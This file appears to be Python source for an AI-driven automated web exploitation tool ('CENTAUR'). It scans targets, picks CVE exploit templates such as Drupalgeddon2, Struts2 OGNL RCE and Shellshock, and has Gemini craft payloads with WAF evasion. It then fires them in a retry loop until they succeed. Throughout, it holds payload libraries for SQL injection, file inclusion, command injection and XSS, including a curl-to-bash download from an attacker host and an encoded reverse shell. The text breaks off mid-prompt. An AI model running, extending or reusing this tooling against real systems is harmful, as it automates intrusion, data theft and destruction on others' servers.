import asyncio import httpx import ssl import csv import time import json import base64 import hashlib import re import urllib.parse import pandas as pd import gradio as gr from collections import defaultdict from typing import Dict, List, Tuple, Any, Optional from pydantic import BaseModel, Field from datetime import datetime import traceback try: from google import genai from google.genai import types GEMINI_AVAILABLE = True except ImportError: GEMINI_AVAILABLE = False # ============================================================================== # ENGINE CONTROLS & HEADERS # ============================================================================== MAX_CONCURRENT_RECON = 30 SCAN_TIMEOUT = 8.0 EXPLOIT_TIMEOUT = 15.0 MAX_FIX_ITERATIONS = 3 # Maximum attempts to fix/refine a payload HTTP_HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/json,*/*", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", } # ============================================================================== # METASPLOIT EXPLOIT TEMPLATES # ============================================================================== METASPLOIT_TEMPLATES = { "drupal_drupalgeddon2": { "name": "Drupal Drupalgeddon 2 RCE", "description": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - RCE via form rendering", "cve": "CVE-2018-7600", "target_paths": ["/user/register", "/?q=user/register", "/user/password"], "method": "POST", "payload_template": { "form_id": "user_register_form", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "{COMMAND}" } }, "joomla_http_header_rce": { "name": "Joomla 3.0.0-3.4.6 RCE", "description": "Joomla HTTP Header Unauthenticated Remote Code Execution", "cve": "CVE-2015-8562", "target_paths": ["/"], "method": "GET", "headers": { "User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'" } }, "wordpress_xmlrpc_pingback": { "name": "WordPress 
XML-RPC Pingback", "description": "WordPress XML-RPC SSRF/Port Scanner", "cve": "N/A", "target_paths": ["/xmlrpc.php"], "method": "POST", "headers": {"Content-Type": "text/xml"}, "payload_template": """ pingback.ping {TARGET_URL} {BLOG_URL} """ }, "struts2_content_type": { "name": "Apache Struts2 Content-Type RCE", "description": "Apache Struts 2.3.5 - 2.3.31 / 2.5 - 2.5.10 RCE", "cve": "CVE-2017-5638", "target_paths": ["/"], "method": "POST", "headers": { "Content-Type": "%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" } }, "shellshock": { "name": "Shellshock (Bash Remote Code Execution)", "description": "GNU Bash 4.3 and earlier Remote Code Execution", "cve": "CVE-2014-6271", "target_paths": ["/cgi-bin/status", "/cgi-bin/test.cgi", "/cgi-bin/admin.cgi"], "method": "GET", "headers": { "User-Agent": "() { :; }; echo; /bin/bash -c '{COMMAND}'" } } } # ============================================================================== # ADVANCED PAYLOAD LIBRARY (enriched) # ============================================================================== PAYLOAD_LIBRARY = { "SQLi": { "Time-Based Blind": [ "' OR SLEEP(5)--", "' AND IF(1=1,SLEEP(5),0)--", "'; WAITFOR DELAY '00:00:05'--", "' OR pg_sleep(5)--", "1' AND (SELECT * 
FROM (SELECT(SLEEP(5)))a)--", "' OR 1=1 AND SLEEP(5)--", "\" OR SLEEP(5)--", "1; SELECT SLEEP(5)--", ], "Union-Based": [ "' UNION SELECT NULL,NULL,NULL--", "' UNION SELECT 1,@@version,3--", "' UNION SELECT table_name,NULL FROM information_schema.tables--", "-1' UNION ALL SELECT NULL,concat(username,0x3a,password),NULL FROM users--", "' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()--", "' UNION SELECT NULL,load_file('/etc/passwd'),NULL--", ], "Error-Based": [ "' AND extractvalue(1,concat(0x7e,version()))--", "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--", "' OR 1=convert(int,(SELECT @@version))--", "' AND updatexml(1,concat(0x7e,(SELECT database())),1)--", "' AND exp(~(SELECT * FROM (SELECT user())a))--", ], "Boolean-Based": [ "' AND '1'='1", "' AND '1'='2", "' AND SUBSTRING(@@version,1,1)='5'--", "' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--", "' AND (SELECT COUNT(*) FROM users)>0--", "' OR EXISTS(SELECT * FROM users)--", ], "Stacked-Queries": [ "'; INSERT INTO users VALUES('hacked','hacked')--", "'; UPDATE users SET password='hacked' WHERE '1'='1'--", "'; DROP TABLE users--", "'; EXEC xp_cmdshell('whoami')--", ], "WAF-Bypass": [ "' /*!OR*/ 1=1--", "' OR/**/1=1--", "' %4fR 1=1--", "'/**/OR/**/1=1--", "' oR sLeEp(5)--", "' OR 0x31=0x31--", ], }, "LFI": { "Basic": [ "../../../../etc/passwd", "..\\..\\..\\..\\windows\\win.ini", "....//....//....//etc/passwd", "..%2f..%2f..%2fetc%2fpasswd", "/etc/passwd", "../../etc/shadow", "../../etc/hosts", ], "Null-Byte": [ "../../../../etc/passwd%00", "../../../../etc/passwd%00.jpg", "../../../../etc/passwd\x00", "../../../../etc/passwd%00.php", ], "Encoding": [ "....%252f....%252f....%252fetc%252fpasswd", "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd", "%252e%252e%252f%252e%252e%252fetc%252fpasswd", 
"..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd", ], "Filter-Bypass": [ "/var/www/../../etc/passwd", r"....\/....\/....\/etc/passwd", "/etc/passwd/.", "php://filter/convert.base64-encode/resource=/etc/passwd", ], "PHP-Wrappers": [ "php://filter/convert.base64-encode/resource=index.php", "php://filter/read=string.rot13/resource=config.php", "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=", "php://input", "phar://./test.phar/test.txt", "zip://shell.jpg%23payload.php", "expect://id", ], "Log-Poisoning": [ "/var/log/apache2/access.log", "/var/log/nginx/access.log", "/proc/self/environ", "/proc/self/fd/0", "/var/log/auth.log", ], }, "RCE": { "Command-Injection": [ "; id", "| whoami", "`uname -a`", "$(cat /etc/passwd)", "; curl http://attacker.com/shell.sh | bash", "&& id", "|| id", "; ls -la /", "\n id", "%0a id", ], "PHP-Exec": [ "", "", "", "", "", ], "Encoded": [ "; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjE= | base64 -d | bash", "; ${IFS}id", "; cat", "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}", "${T(java.lang.Runtime).getRuntime().exec('id')}", ], }, "XSS": { "Reflected": [ "", "", "", "'-alert(1)-'", "", "\">", "'>", ], "Stored": [ "", "", "", ], "DOM-Based": [ "javascript:alert(1)", "#", "#\">", ], "Encoded": [ "%3Cscript%3Ealert(1)%3C/script%3E", "<script>alert(1)</script>", "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e", "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e", ], "Filter-Bypass": [ "", "", "attr": "\" onmouseover=\"alert(1)", "js": "';alert(1)//", "url": "javascript:alert(1)", "svg": "", "img": "", } payload = base_payloads.get(context, base_payloads["html"]) if exfil_url: payload = f"" if bypass: payload = payload.replace("", # expect: 49 "Pebble": "{{7*'7'}}", # Jinja2: 49, Twig: 7777777 "Mako": "${7*7}", } return probes def generate_jinja2_rce(command="id"): """Generate Jinja2 RCE payload.""" return ( "{%for c in [].__class__.__base__.__subclasses__()%}" "{%if c.__name__=='catch_warnings'%}" 
"{{c.__init__.__globals__['__builtins__']" f".eval(\"__import__('os').popen('{command}').read()\")" "}}{%endif%}{%endfor%}" ) for engine, probe in generate_ssti_probes().items(): print(f"{engine}: {probe}") print("\\nRCE:", generate_jinja2_rce("id")) ''', "Custom": '''import urllib.parse, base64, re def generate_custom_payload(base_payload, encoding=None, evasion=None, prefix="", suffix=""): """ Flexible payload generator. Args: base_payload : The base attack string encoding : url | double_url | base64 | html_entity | unicode_escape evasion : case_variation | comment_insertion | whitespace_abuse | null_bytes prefix/suffix: Wrap the final payload """ result = base_payload # Evasion transforms (applied before encoding) if evasion == "case_variation": result = "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(result)) elif evasion == "comment_insertion": result = result.replace(" ", "/**/") elif evasion == "whitespace_abuse": result = result.replace(" ", "%09") # tab elif evasion == "null_bytes": result = result.replace(" ", "%00 ") # Encoding layer if encoding == "url": result = urllib.parse.quote(result, safe="") elif encoding == "double_url": result = urllib.parse.quote(urllib.parse.quote(result, safe=""), safe="") elif encoding == "base64": result = base64.b64encode(result.encode()).decode() elif encoding == "html_entity": result = "".join(f"&#{ord(c)};" for c in result) elif encoding == "unicode_escape": result = result.encode("unicode_escape").decode() return f"{prefix}{result}{suffix}" # Example: SQLi with comment-insertion WAF bypass print(generate_custom_payload("' OR 1=1--", evasion="comment_insertion")) # URL-encoded XSS print(generate_custom_payload("", encoding="url")) # Double-URL LFI print(generate_custom_payload("../../../../etc/passwd", encoding="double_url")) ''' } # ============================================================================== # AI STRUCTURED OUTPUT SCHEMAS # 
# Structured-output schema for the target-analysis step: its JSON schema is
# handed to the model as the response schema and the reply is parsed back with
# model_validate_json(). The Field descriptions are therefore part of the
# prompt contract, not just documentation.
# NOTE: documented with comments rather than a class docstring on purpose --
# pydantic copies a class docstring into the generated JSON schema.
class VulnerabilityAnalysis(BaseModel):
    vulnerability_type: str = Field(description="Primary vulnerability class (SQLi, LFI, RCE, XSS, SSTI, NoSQLi, etc.)")
    confidence: str = Field(description="Confidence level: High, Medium, Low")
    attack_vector: str = Field(description="Specific attack approach")
    target_parameters: List[str] = Field(description="Vulnerable parameters or paths")
    reasoning: str = Field(description="Technical reasoning for this assessment")
    # Optional lists: default to empty when the model omits them.
    secondary_vulns: List[str] = Field(default=[], description="Other potential vulnerabilities to probe")
    related_cves: List[str] = Field(default=[], description="Known CVEs that might apply")


# Structured-output schema for the strategy step. The first five fields are
# required in the model's reply; the remaining ones fall back to the defaults
# below (GET, empty strings) when absent.
class AttackStrategy(BaseModel):
    vulnerability_class: str = Field(description="Class of vulnerability")
    target_endpoint: str = Field(description="Specific endpoint and parameter")
    strategy: str = Field(description="Attack methodology")
    evasion_techniques: List[str] = Field(description="WAF/IDS evasion methods to apply")
    expected_indicators: List[str] = Field(description="Success indicators to look for")
    http_method: str = Field(default="GET", description="HTTP method to use: GET, POST, PUT")
    content_type: str = Field(default="", description="Content-Type header if POST/PUT needed")
    request_body_template: str = Field(default="", description="Body template for POST requests, use {PAYLOAD} placeholder")
    # Compared against the keys of METASPLOIT_TEMPLATES by the payload step;
    # an empty string means "no template".
    metasploit_template: str = Field(default="", description="Metasploit template to use if applicable")
class ExploitLogger:
    """Append-only, in-memory event log shared by the engine.

    Each entry is a dict with the keys ``timestamp`` (local time,
    millisecond precision), ``level``, ``message`` and ``context``.
    """

    def __init__(self):
        self.logs = []

    def log(self, level: str, message: str, context: Optional[dict] = None):
        """Record one event and return the stored entry.

        Args:
            level: Free-form severity label (e.g. ``"INFO"``, ``"ERROR"``).
            message: Human-readable description of the event.
            context: Optional extra data; a falsy value is stored as ``{}``.

        Returns:
            The entry dict that was appended to ``self.logs``.
        """
        if not context:
            stored_context = {}
        elif isinstance(context, dict):
            # Snapshot the mapping so a caller that keeps mutating its own
            # dict cannot silently rewrite an already-recorded entry.
            stored_context = dict(context)
        else:
            # Non-dict context objects were accepted before; keep them as-is.
            stored_context = context

        entry = {
            # %f yields microseconds; dropping the last three digits leaves ms.
            "timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3],
            "level": level,
            "message": message,
            "context": stored_context,
        }
        self.logs.append(entry)
        return entry

    def get_logs(self, level=None):
        """Return recorded entries, optionally restricted to one ``level``.

        A new list is returned in both cases, so callers may sort, slice or
        clear the result without affecting the logger's own storage.
        """
        if level:
            return [entry for entry in self.logs if entry["level"] == level]
        return list(self.logs)

    def format_logs(self):
        """Render all entries as ``[timestamp] LEVEL: message[ | context]`` lines."""
        rendered = []
        for entry in self.logs:
            suffix = f" | {entry['context']}" if entry["context"] else ""
            rendered.append(
                f"[{entry['timestamp']}] {entry['level']}: {entry['message']}{suffix}"
            )
        return "\n".join(rendered)

    def clear(self):
        """Discard every recorded entry."""
        self.logs = []


# Module-wide logger instance used by the rest of the file.
exploit_logger = ExploitLogger()


class ReconProfile:
    """Mutable container for everything learned about one ``host:port`` target.

    All collection attributes start empty and are filled in by the recon
    engine; ``protocol`` starts as ``"http"`` and ``server_banner`` as the
    sentinel string ``"Unknown"``.
    """

    def __init__(self, host: str, port: int):
        self.target_id = f"{host}:{port}"
        self.host = host
        self.port = port
        self.protocol = "http"
        self.is_alive = False
        self.server_banner = "Unknown"
        self.waf_detected = "None"
        self.discovered_paths = []
        self.error_signatures = []
        self.technologies = []
        self.cookies = {}
        self.forms_found = []
        self.api_endpoints = []
        self.response_time_baseline = 0.0
        self.redirect_chain = []
        self.injectable_params = []
        self.cms_detected = ""

    @property
    def is_exploitable(self):
        """True when the target is alive and at least one finding exists.

        A finding is any discovered path, error signature, form or API
        endpoint, or a server banner other than ``"Unknown"``.
        """
        has_findings = any((
            self.discovered_paths,
            self.error_signatures,
            self.forms_found,
            self.api_endpoints,
            self.server_banner != "Unknown",
        ))
        return self.is_alive and has_findings

    def to_dict(self):
        """Return a flat summary row (counts, not full lists) for display."""
        return {
            "target_id": self.target_id,
            "protocol": self.protocol,
            "server": self.server_banner,
            "waf": self.waf_detected,
            "cms": self.cms_detected,
            "paths": len(self.discovered_paths),
            "errors": len(self.error_signatures),
            "forms": len(self.forms_found),
            "apis": len(self.api_endpoints),
            # Only the first three technologies are shown to keep the row short.
            "tech": ", ".join(self.technologies[:3]),
        }
await asyncio.wait_for( asyncio.open_connection(self.p.host, self.p.port, ssl=conf), timeout=2.0 ) writer.close() await writer.wait_closed() self.p.protocol = "https" except Exception: self.p.protocol = "http" def _url(self, path=""): return f"{self.p.protocol}://{self.p.host}:{self.p.port}{path}" async def _fingerprint_tech(self, response): headers = response.headers body = response.text.lower() if "x-powered-by" in headers: self.p.technologies.append(f"Powered-By: {headers['x-powered-by']}") if "laravel" in body or "laravel_session" in str(response.cookies): self.p.technologies.append("Laravel") if "wordpress" in body or "wp-content" in body: self.p.technologies.append("WordPress") self.p.cms_detected = "WordPress" if "django" in body or "csrftoken" in str(response.cookies): self.p.technologies.append("Django") if "express" in headers.get("x-powered-by", "").lower(): self.p.technologies.append("Express.js") if "flask" in body or "werkzeug" in headers.get("server", "").lower(): self.p.technologies.append("Flask") if "joomla" in body: self.p.technologies.append("Joomla") self.p.cms_detected = "Joomla" if "drupal" in body: self.p.technologies.append("Drupal") self.p.cms_detected = "Drupal" if "struts" in body or "struts" in headers.get("x-powered-by", "").lower(): self.p.technologies.append("Apache Struts") waf_indicators = { "cloudflare": ["cf-ray", "__cfduid"], "akamai": ["akamai", "ak_bmsc"], "aws-waf": ["x-amzn-trace-id", "x-amz-"], "imperva": ["x-iinfo", "incap_ses"], "f5": ["x-wa-info", "f5"], "fortiweb": ["fortigate", "fortiweb"], "modsecurity": ["mod_security", "modsec"], } for waf_name, indicators in waf_indicators.items(): if any(ind in str(headers).lower() for ind in indicators): self.p.waf_detected = waf_name.upper() break async def _scan_paths(self): paths = [ "/admin", "/administrator", "/admin.php", "/wp-admin", "/phpmyadmin", "/cpanel", "/controlpanel", "/dashboard", "/.env", "/.git/config", "/config.php", "/wp-config.php", "/web.config", 
"/.htaccess", "/robots.txt", "/sitemap.xml", "/api", "/api/v1", "/api/v2", "/graphql", "/rest", "/api/users", "/api/admin", "/api/config", "/upload", "/uploads", "/files", "/download", "/search", "/login", "/logout", "/register", "/?id=1", "/?user=admin", "/?file=index", "/search?q=test", "/api/users?id=1", "/index.php?page=home", "/?page=about", "/xmlrpc.php", "/cgi-bin/status", ] tasks = [self.client.get(self._url(p)) for p in paths] results = await asyncio.gather(*tasks, return_exceptions=True) for path, res in zip(paths, results): if isinstance(res, Exception): continue if hasattr(res, 'history') and res.history: self.p.redirect_chain.append(f"{path} -> {res.url}") if res.status_code in [200, 401, 403, 405]: if "?" not in path: self.p.discovered_paths.append(path) else: self.p.api_endpoints.append(path) params = re.findall(r'\?([^=]+)=|&([^=]+)=', path) for p_match in params: param = p_match[0] or p_match[1] if param and param not in self.p.injectable_params: self.p.injectable_params.append(param) if " (baseline + 4.0) and any(x in payload.upper() for x in ["SLEEP", "WAITFOR", "PG_SLEEP", "DBMS_PIPE"])): result.success = True result.evidence.append(f"Time-Based SQLi: {result.response_time:.2f}s delay") # SQL error leak sql_errors = ["sql syntax", "mysql", "postgresql", "sqlite", "oracle", "mssql", "syntax error at", "quoted string not properly terminated", "unclosed quotation", "division by zero", "invalid column"] for err in sql_errors: if err in body_lower: result.success = True result.evidence.append(f"SQL Error: '{err}'") # RCE / command output rce_markers = ["uid=", "gid=", "groups=", "Linux version", "Windows NT", "Microsoft Windows", "drwx", "total ", "/bin/bash", "root@", "#", "SYSTEM", "nt authority"] for marker in rce_markers: if marker in resp.text: result.success = True result.evidence.append(f"RCE: '{marker}' found") result.extracted_data = resp.text[:800] # XXE if " str: """Execute a payload code template and return the printed output.""" import 
io, contextlib out = io.StringIO() local_ns = {} try: with contextlib.redirect_stdout(out): exec(compile(code, "", "exec"), {}, local_ns) printed = out.getvalue().strip() if printed: return printed.split("\n")[0] if "payload" in local_ns: return str(local_ns["payload"]) except Exception as e: return f"# Code error: {e}" return "" # ============================================================================== # AI AGENT FUNCTIONS (UPGRADED TO GEMINI 2.5) # ============================================================================== async def ai_analyze_target(profile: ReconProfile, api_key: str) -> Optional[VulnerabilityAnalysis]: """Analyze target using Gemini 2.5 with Google Search grounding""" if not api_key: return None llm = genai.Client(api_key=api_key) # Build context with CMS/technology specific CVE search hints search_hints = [] if profile.cms_detected: search_hints.append(f"{profile.cms_detected} known CVEs") for tech in profile.technologies[:3]: search_hints.append(f"{tech} vulnerabilities") context = f""" Analyze this web application target for vulnerabilities: TARGET: {profile.target_id} SERVER: {profile.server_banner} WAF: {profile.waf_detected} CMS: {profile.cms_detected} TECHNOLOGIES: {', '.join(profile.technologies)} INJECTABLE PARAMS: {profile.injectable_params[:10]} DISCOVERED PATHS: {profile.discovered_paths[:10]} API ENDPOINTS: {profile.api_endpoints[:10]} FORMS FOUND: {profile.forms_found[:5]} ERROR SIGNATURES: {profile.error_signatures[:5]} SEARCH FOR: Known CVEs and exploits related to: {', '.join(search_hints[:5])} Provide a detailed vulnerability assessment focusing on the most exploitable attack vectors. Include any known CVEs that apply to the detected technologies. Include secondary vulnerabilities to chain. 
""" try: # Enable Google Search grounding grounding_tool = types.Tool(google_search=types.GoogleSearch()) config = types.GenerateContentConfig( tools=[grounding_tool], response_mime_type="application/json", response_json_schema=VulnerabilityAnalysis.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) return VulnerabilityAnalysis.model_validate_json(resp.text) except Exception as e: exploit_logger.log("ERROR", f"AI Analysis error: {e}") return None async def ai_generate_strategy(profile: ReconProfile, analysis: VulnerabilityAnalysis, api_key: str) -> Optional[AttackStrategy]: """Generate attack strategy with Metasploit template matching""" llm = genai.Client(api_key=api_key) # Check if we have a matching Metasploit template matching_template = None for template_id, template in METASPLOIT_TEMPLATES.items(): if profile.cms_detected and profile.cms_detected.lower() in template["name"].lower(): matching_template = template_id break for cve in analysis.related_cves: if cve in template.get("cve", ""): matching_template = template_id break context = f""" Based on this vulnerability analysis, create a detailed attack strategy: ANALYSIS: {analysis.model_dump_json(indent=2)} TARGET CONTEXT: - Server: {profile.server_banner} - WAF: {profile.waf_detected} - CMS: {profile.cms_detected} - Technologies: {', '.join(profile.technologies)} - Available endpoints: {profile.api_endpoints[:5]} - Forms: {profile.forms_found[:5]} - Injectable params: {profile.injectable_params[:10]} METASPLOIT TEMPLATES AVAILABLE: {json.dumps(METASPLOIT_TEMPLATES, indent=2)} {"RECOMMENDED TEMPLATE: " + matching_template if matching_template else ""} Specify whether to use GET or POST. For SQLi/LFI/XSS in form fields use POST. If a Metasploit template applies, specify it in the metasploit_template field. Generate a comprehensive attack strategy including WAF evasion techniques. 
""" try: grounding_tool = types.Tool(google_search=types.GoogleSearch()) config = types.GenerateContentConfig( tools=[grounding_tool], response_mime_type="application/json", response_json_schema=AttackStrategy.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) return AttackStrategy.model_validate_json(resp.text) except Exception as e: exploit_logger.log("ERROR", f"Strategy generation error: {e}") return None async def ai_craft_payload(strategy: AttackStrategy, profile: ReconProfile, api_key: str) -> Optional[PayloadGeneration]: """Craft payload with Metasploit template support""" llm = genai.Client(api_key=api_key) vuln_class = strategy.vulnerability_class library_payloads = [] for vtype, categories in PAYLOAD_LIBRARY.items(): if vtype.lower() in vuln_class.lower() or vuln_class.lower() in vtype.lower(): for cat_payloads in categories.values(): library_payloads.extend(cat_payloads[:3]) # Get Metasploit template if specified metasploit_context = "" if strategy.metasploit_template and strategy.metasploit_template in METASPLOIT_TEMPLATES: template = METASPLOIT_TEMPLATES[strategy.metasploit_template] metasploit_context = f""" METASPLOIT TEMPLATE TO USE: {json.dumps(template, indent=2)} Use this template as the basis for your payload. Adapt it for the target endpoint. 
""" template_hint = "Custom" if "SQLi" in vuln_class or "SQL" in vuln_class: template_hint = "SQLi_TimeBased" if "time" in strategy.strategy.lower() else "SQLi_Union" elif "LFI" in vuln_class: template_hint = "LFI_Basic" elif "RCE" in vuln_class or "Command" in vuln_class: template_hint = "RCE_CommandInjection" elif "XSS" in vuln_class: template_hint = "XSS_Basic" elif "SSTI" in vuln_class: template_hint = "SSTI_Detection" context = f""" Craft an advanced exploitation payload with Python code: STRATEGY: {strategy.model_dump_json(indent=2)} WAF DETECTED: {profile.waf_detected} SERVER: {profile.server_banner} {metasploit_context} REFERENCE PAYLOADS (use as inspiration, modify for evasion): {json.dumps(library_payloads[:12], indent=2)} PYTHON CODE TEMPLATE BASE (extend/modify this): ```python {PAYLOAD_CODE_TEMPLATES.get(template_hint, PAYLOAD_CODE_TEMPLATES["Custom"])} ``` REQUIREMENTS: 1. Generate the exact payload string ready to fire 2. Provide Python code that generates this payload as a callable function 3. Apply WAF evasion from the strategy 4. Set inject_in_body=True and provide content_type if the attack needs POST body injection 5. Provide 4+ alternative payloads ranked by likelihood of success 6. 
If using a Metasploit template, adapt it for this specific target """ try: grounding_tool = types.Tool(google_search=types.GoogleSearch()) config = types.GenerateContentConfig( tools=[grounding_tool], response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) pg = PayloadGeneration.model_validate_json(resp.text) exploit_logger.log("INFO", "AI generated payload", { "payload": pg.payload[:80], "encoding": pg.encoding, "method": pg.http_method, }) return pg except Exception as e: exploit_logger.log("ERROR", f"Payload generation error: {e}") return None async def ai_analyze_exploit_result(result: ExploitResult, payload: str, api_key: str) -> Optional[ExploitAnalysis]: """Analyze exploit results and provide fix suggestions""" llm = genai.Client(api_key=api_key) context = f""" Analyze this exploitation attempt: PAYLOAD USED: {payload} RESULTS: - Status Code: {result.status_code} - Response Time: {result.response_time}s - Evidence Found: {result.evidence} RESPONSE SNIPPET: {result.response_body[:800]} EXTRACTED DATA: {result.extracted_data[:400]} Determine if the exploit succeeded, what was confirmed, and recommend next escalation steps. If the exploit failed, provide specific suggestions to fix/improve the payload. 
""" try: config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=ExploitAnalysis.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=context, config=config ) return ExploitAnalysis.model_validate_json(resp.text) except Exception as e: exploit_logger.log("ERROR", f"Exploit analysis error: {e}") return None # ============================================================================== # AI CODE PATCHING # ============================================================================== async def ai_patch_payload_code(current_code: str, user_request: str, context: dict, api_key: str) -> Optional[PayloadPatchResponse]: llm = genai.Client(api_key=api_key) prompt = f""" You are a penetration testing expert. Patch the following Python payload generation code. CURRENT CODE: ```python {current_code} ``` CONTEXT: - Target: {context.get('target', 'Unknown')} - Server: {context.get('server', 'Unknown')} - WAF: {context.get('waf', 'None')} - Last Result: {context.get('last_result', 'N/A')} USER REQUEST: {user_request} INSTRUCTIONS: 1. Modify the code to address the user's request 2. Keep it as executable Python code with functions 3. Add comments explaining changes 4. Ensure the code prints the primary payload as the first line of stdout Provide patched code and explain what changed. 
""" try: config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=PayloadPatchResponse.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=prompt, config=config ) patch = PayloadPatchResponse.model_validate_json(resp.text) exploit_logger.log("INFO", "AI patched code", {"changes": len(patch.changes_made)}) return patch except Exception as e: exploit_logger.log("ERROR", f"Code patching failed: {e}") return None # ============================================================================== # FIX LOOP - Iterative Payload Refinement # ============================================================================== async def fix_loop_execute(profile: ReconProfile, strategy: AttackStrategy, initial_payload: PayloadGeneration, api_key: str, max_iterations: int = MAX_FIX_ITERATIONS): """ Execute payload with fix loop: try -> analyze -> fix -> retry """ exploit_logger.log("INFO", f"Starting fix loop with max {max_iterations} iterations") current_payload = initial_payload iteration_results = [] for iteration in range(max_iterations): exploit_logger.log("INFO", f"Fix loop iteration {iteration + 1}/{max_iterations}") # Fire the payload result = await advanced_payload_fire( profile.protocol, profile.host, profile.port, strategy.target_endpoint, current_payload.payload, profile.response_time_baseline, http_method=current_payload.http_method, inject_in_body=current_payload.inject_in_body, content_type=current_payload.content_type, ) # Analyze the result analysis = await ai_analyze_exploit_result(result, current_payload.payload, api_key) iteration_results.append({ "iteration": iteration + 1, "payload": current_payload.payload[:100], "success": result.success, "evidence": result.evidence, "analysis": analysis.model_dump() if analysis else None }) # If successful, we're done if result.success: exploit_logger.log("INFO", f"Fix loop succeeded on iteration {iteration + 1}") return result, 
iteration_results # If we have fix suggestions and haven't hit max iterations, try to fix if analysis and analysis.fix_suggestions and iteration < max_iterations - 1: exploit_logger.log("INFO", f"Attempting to fix payload based on suggestions") # Generate improved payload based on suggestions fix_context = f""" Previous payload failed. Apply these fixes: {', '.join(analysis.fix_suggestions)} Original strategy: {strategy.model_dump_json(indent=2)} Last result: - Status: {result.status_code} - Evidence: {result.evidence} - Response: {result.response_body[:200]} Generate an improved payload that addresses the failure. """ try: llm = genai.Client(api_key=api_key) config = types.GenerateContentConfig( response_mime_type="application/json", response_json_schema=PayloadGeneration.model_json_schema() ) resp = await llm.aio.models.generate_content( model="gemini-2.5-flash", contents=fix_context, config=config ) current_payload = PayloadGeneration.model_validate_json(resp.text) exploit_logger.log("INFO", f"Generated new payload: {current_payload.payload[:80]}") except Exception as e: exploit_logger.log("ERROR", f"Failed to generate fix: {e}") break else: # No more suggestions or max iterations reached break exploit_logger.log("INFO", f"Fix loop completed after {len(iteration_results)} iterations") return result, iteration_results # ============================================================================== # WAR ROOM AGENT # ============================================================================== async def centaur_chat_agent(user_msg, chat_history, target_id, state, current_ep, current_pl, current_code, http_method, api_key): """Centaur chat agent with Gradio 6 compatibility""" chat_history = chat_history or [] if not api_key or not target_id: chat_history.append({"role": "user", "content": user_msg}) chat_history.append({"role": "assistant", "content": "๐Ÿ”ด Missing API Key or Target Selection."}) return chat_history, current_ep, current_pl, current_code, 
http_method, state llm = genai.Client(api_key=api_key) p = state["profiles"][target_id] recent_arsenal = state["arsenal"][target_id][-5:] if target_id in state["arsenal"] else [] context = f""" You are CENTAUR, an elite Red Team AI assistant specialising in web application security. TARGET INTELLIGENCE: - ID: {target_id} - Server: {p.server_banner} - WAF: {p.waf_detected} - CMS: {p.cms_detected} - Technologies: {', '.join(p.technologies)} - Discovered Paths: {p.discovered_paths[:10]} - API Endpoints: {p.api_endpoints[:10]} - Forms: {p.forms_found[:5]} - Injectable Params: {p.injectable_params[:10]} - Error Signatures: {p.error_signatures[:5]} - Response Baseline: {p.response_time_baseline:.2f}s CURRENT STATE: HTTP Method: {http_method} Endpoint: {current_ep} Payload: {current_pl} CURRENT CODE: ```python {current_code} ``` RECENT ATTEMPTS: {json.dumps(recent_arsenal, indent=2)} OPERATOR REQUEST: {user_msg} INSTRUCTIONS: 1. Analyse the request using all available intelligence 2. Update endpoint, payload, code, and HTTP method as needed 3. Provide expert technical guidance with specific references to recon data 4. Explain evasion techniques clearly 5. 
